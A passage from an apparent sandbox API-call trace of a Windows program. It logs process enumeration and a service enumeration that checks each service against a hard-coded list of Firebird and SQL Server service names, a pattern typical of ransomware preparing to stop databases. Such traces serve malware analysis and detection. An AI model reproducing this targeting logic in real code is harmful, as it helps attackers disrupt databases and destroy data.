th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.717] lstrlenW (lpString="svchost.exe") returned 11 [0063.717] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.718] lstrlenW (lpString="svchost.exe") returned 11 [0063.718] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0063.719] CloseHandle (hObject=0x340) returned 1 [0063.719] Sleep (dwMilliseconds=0x1f4) [0064.802] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ede0 [0064.802] EnumServicesStatusExW (in: hSCManager=0x60ede0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0064.803] GetLastError () returned 0xea [0064.803] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1d5a) returned 0x43c20f8 [0064.803] EnumServicesStatusExW (in: hSCManager=0x60ede0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x43c20f8, cbBufSize=0x1d5a, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x43c20f8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0064.804] CloseServiceHandle (hSCObject=0x60ede0) returned 1 [0064.804] lstrlenW (lpString="Appinfo") returned 7 [0064.804] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0064.804] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0064.804] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0064.804] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0064.804] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0064.804] lstrlenW (lpString="AppXSvc") returned 7 [0064.804] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0064.804] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0064.804] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0064.804] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0064.804] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0064.804] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0064.804] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0064.804] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0064.804] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0064.804] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0064.805] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0064.805] lstrlenW (lpString="Audiosrv") returned 8 [0064.805] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0064.805] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0064.805] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0064.805] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0064.805] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0064.805] lstrlenW (lpString="BFE") returned 3 [0064.805] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0064.805] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0064.805] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0064.805] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0064.805] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0064.805] lstrlenW (lpString="BITS") returned 4 [0064.805] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0064.805] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0064.805] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0064.805] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0064.805] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0064.805] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0064.805] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0064.805] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0064.805] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0064.805] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0064.805] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0064.805] lstrlenW (lpString="CDPSvc") returned 6 [0064.805] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0064.805] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0064.805] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0064.806] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0064.806] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0064.806] lstrlenW (lpString="ClickToRunSvc") returned 13 [0064.806] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0064.806] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0064.806] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0064.806] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0064.806] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0064.806] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0064.806] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0064.806] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0064.806] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0064.806] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0064.806] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0064.806] lstrlenW (lpString="CryptSvc") returned 8 [0064.806] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0064.806] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0064.806] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0064.806] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0064.806] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0064.807] lstrlenW (lpString="DcomLaunch") returned 10 [0064.807] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0064.807] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0064.807] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0064.807] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0064.807] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0064.807] lstrlenW (lpString="DeviceAssociationService") returned 24 [0064.807] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0064.807] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0064.807] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0064.807] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0064.807] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0064.807] lstrlenW (lpString="Dhcp") returned 4 [0064.807] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0064.807] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0064.807] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0064.807] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0064.807] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0064.807] lstrlenW (lpString="Dnscache") returned 8 [0064.807] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0064.807] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0064.807] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0064.808] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0064.808] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0064.808] lstrlenW (lpString="DoSvc") returned 5 [0064.808] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0064.808] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0064.808] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0064.808] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0064.808] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0064.808] lstrlenW (lpString="DPS") returned 3 [0064.808] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0064.808] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0064.808] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0064.808] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0064.808] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0064.808] lstrlenW (lpString="DusmSvc") returned 7 [0064.808] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0064.808] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0064.808] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0064.808] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0064.808] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0064.808] lstrlenW (lpString="EventLog") returned 8 [0064.808] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0064.808] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0064.808] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0064.808] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0064.808] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0064.809] lstrlenW (lpString="EventSystem") returned 11 [0064.809] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0064.809] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0064.809] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0064.809] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0064.809] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0064.809] lstrlenW (lpString="FontCache") returned 9 [0064.809] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0064.809] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0064.809] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0064.809] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0064.809] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0064.809] lstrlenW (lpString="gpsvc") returned 5 [0064.809] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0064.809] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0064.809] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0064.809] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0064.809] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0064.809] lstrlenW (lpString="iphlpsvc") returned 8 [0064.809] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0064.809] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0064.809] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0064.809] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0064.809] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0064.809] lstrlenW (lpString="KeyIso") returned 6 [0064.809] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0064.810] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0064.810] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0064.810] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0064.810] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0064.810] lstrlenW (lpString="LanmanServer") returned 12 [0064.810] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0064.810] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0064.810] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0064.810] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0064.810] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0064.810] lstrlenW (lpString="LanmanWorkstation") returned 17 [0064.810] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0064.810] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0064.810] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0064.810] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0064.810] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0064.810] lstrlenW (lpString="lfsvc") returned 5 [0064.810] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0064.810] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0064.810] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0064.810] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0064.810] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0064.810] lstrlenW (lpString="lmhosts") returned 7 [0064.810] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0064.810] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0064.810] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0064.810] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0064.811] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0064.811] lstrlenW (lpString="LSM") returned 3 [0064.811] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0064.811] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0064.811] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0064.811] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0064.811] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0064.811] lstrlenW (lpString="MapsBroker") returned 10 [0064.811] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MapsBroker") returned -1 [0064.811] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MapsBroker") returned -1 [0064.811] lstrcmpiW (lpString1="sqlwriter", lpString2="MapsBroker") returned 1 [0064.811] lstrcmpiW (lpString1="mssqlserver", lpString2="MapsBroker") returned 1 [0064.811] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MapsBroker") returned 1 [0064.811] lstrlenW (lpString="MpsSvc") returned 6 [0064.811] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0064.811] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0064.811] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0064.811] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0064.811] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0064.811] lstrlenW (lpString="NcbService") returned 10 [0064.811] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0064.811] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0064.811] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0064.811] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0064.811] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0064.811] lstrlenW (lpString="netprofm") returned 8 [0064.811] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0064.811] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0064.811] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0064.811] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0064.811] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0064.812] lstrlenW (lpString="NlaSvc") returned 6 [0064.812] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0064.812] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0064.812] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0064.812] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0064.812] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0064.812] lstrlenW (lpString="nsi") returned 3 [0064.812] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0064.812] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0064.812] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0064.812] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0064.812] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0064.812] lstrlenW (lpString="PcaSvc") returned 6 [0064.812] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0064.812] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0064.812] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0064.812] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0064.812] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0064.812] lstrlenW (lpString="PlugPlay") returned 8 [0064.812] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0064.812] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0064.812] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0064.812] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0064.812] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0064.812] lstrlenW (lpString="Power") returned 5 [0064.812] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0064.812] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0064.812] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0064.812] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0064.812] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0064.812] lstrlenW (lpString="ProfSvc") returned 7 [0064.813] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0064.813] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0064.813] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0064.813] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0064.813] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0064.813] lstrlenW (lpString="RpcEptMapper") returned 12 [0064.813] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0064.813] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0064.813] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0064.813] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0064.813] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0064.813] lstrlenW (lpString="RpcSs") returned 5 [0064.813] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0064.813] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0064.813] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0064.813] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0064.813] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0064.813] lstrlenW (lpString="SamSs") returned 5 [0064.813] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0064.813] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0064.813] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0064.813] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0064.813] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0064.813] lstrlenW (lpString="Schedule") returned 8 [0064.813] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0064.813] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0064.813] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0064.813] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0064.813] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0064.813] lstrlenW (lpString="SecurityHealthService") returned 21 [0064.813] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0064.814] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0064.814] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0064.814] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0064.814] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0064.814] lstrlenW (lpString="SENS") returned 4 [0064.814] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0064.814] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0064.814] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0064.814] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0064.814] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0064.814] lstrlenW (lpString="ShellHWDetection") returned 16 [0064.814] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0064.814] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0064.814] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0064.814] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0064.814] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0064.814] lstrlenW (lpString="Spooler") returned 7 [0064.814] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0064.814] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0064.814] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0065.301] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0065.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0065.302] lstrlenW (lpString="SSDPSRV") returned 7 [0065.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0065.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0065.302] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0065.302] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0065.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0065.302] lstrlenW (lpString="StateRepository") returned 15 [0065.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0065.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0065.302] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0065.302] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0065.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0065.302] lstrlenW (lpString="SysMain") returned 7 [0065.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0065.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0065.302] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0065.302] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0065.302] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c20f8 | out: hHeap=0x5d0000) returned 1 [0065.302] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x390 [0065.313] Process32FirstW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0065.314] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0065.315] lstrlenW (lpString="System") returned 6 [0065.315] Process32NextW (in: 